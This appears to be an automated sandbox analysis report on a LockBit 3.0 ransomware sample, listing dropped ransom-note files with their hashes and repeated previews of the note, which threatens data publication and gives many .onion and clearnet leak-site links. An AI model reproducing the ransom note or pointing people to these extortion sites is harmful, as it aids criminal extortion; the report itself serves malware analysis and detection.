                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.975341677043763
                Encrypted:false
                SSDEEP:192:IZWp2qfvNwIspY+uDtghwW0ZVlqd0DjRBbeg0Fk3plm4TZNVo:Im2Iv9mY+uDtghpCE0DlZegX33mSnu
                MD5:8E4821B2571D8D441C197CEB6DCAF34E
                SHA1:2DDF64B0A63FFD1DCEDBBA827EDE329DA685CED3
                SHA-256:9DACBA875A3DB014632D1C390F70A4C08D4F2779205DA3529C3BF2BB23ECC137
                SHA-512:CDE61F0FC55C8322C54F4945C4FEB2E1AE4E52B4B6DDB1C1C393D0771AE4581614741EB75A90CA898C4B462FA5495FFFB40463F9D6A7F4A671DF815E7A36029C
                Malicious:false
                Preview:f...iJA3....Ci.m..ah..E.....AC%.U....d.4I...3...Oz.~$@.L...4...kM9..."...~..ax3...<.UP-(...,.\R. p-.q.<.q"S`.[.M.f..1..h.b.._...K...o-p.2.W..Cdm....5.u. .j....c....[......r.]m^pWI.lo..R'r...B...;I......T&.M.4.xPO..tf....Ow..o...4...;=e?liD.`#..q.".-(OqJV^..........m......a...(0.W:..<.....O{.4_D...|D......lX.UCu....M..~.mN..PW....R@9+...Bk.y1._..........Vb](?..T.;.e...b..>UG...j@M..w.,.7......Wv@..#...r....>N.w....U.w...HB..F]L:..m....kMv.`w.;{..<..~....9.) .Tm:.{.K.B.%..f..fC\....&...{.K2.Q...- ....#x...S|.f.'...,$,........~.k.9.E.)}\....*`p.K~.0A.......H.?x1..:B..i5.>.....Y...~...\...R.v..>=d..Qm....nyq...`....K.er.Y......2.....@.Ga.dF4t..G..M.F....e..:....l..}C?.'8.W.^h....a...3..quk..h.W.../...}.u...p!.xK....4#.b{W.x..xZ..y.....T...~a.N.$...3z.4..gzs^......CZ^#.....>uZ...E.w:Yu..>...1.e..-..~_7@...K.W.Z.n.`L..u....s.........p.'l`.....n.#@.....?..=.c.*t....KZG..W....%...^.L..hH.......mP.F.....6...d...U...Tu.....>.~'......('.W..x....}.5SQ

                C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
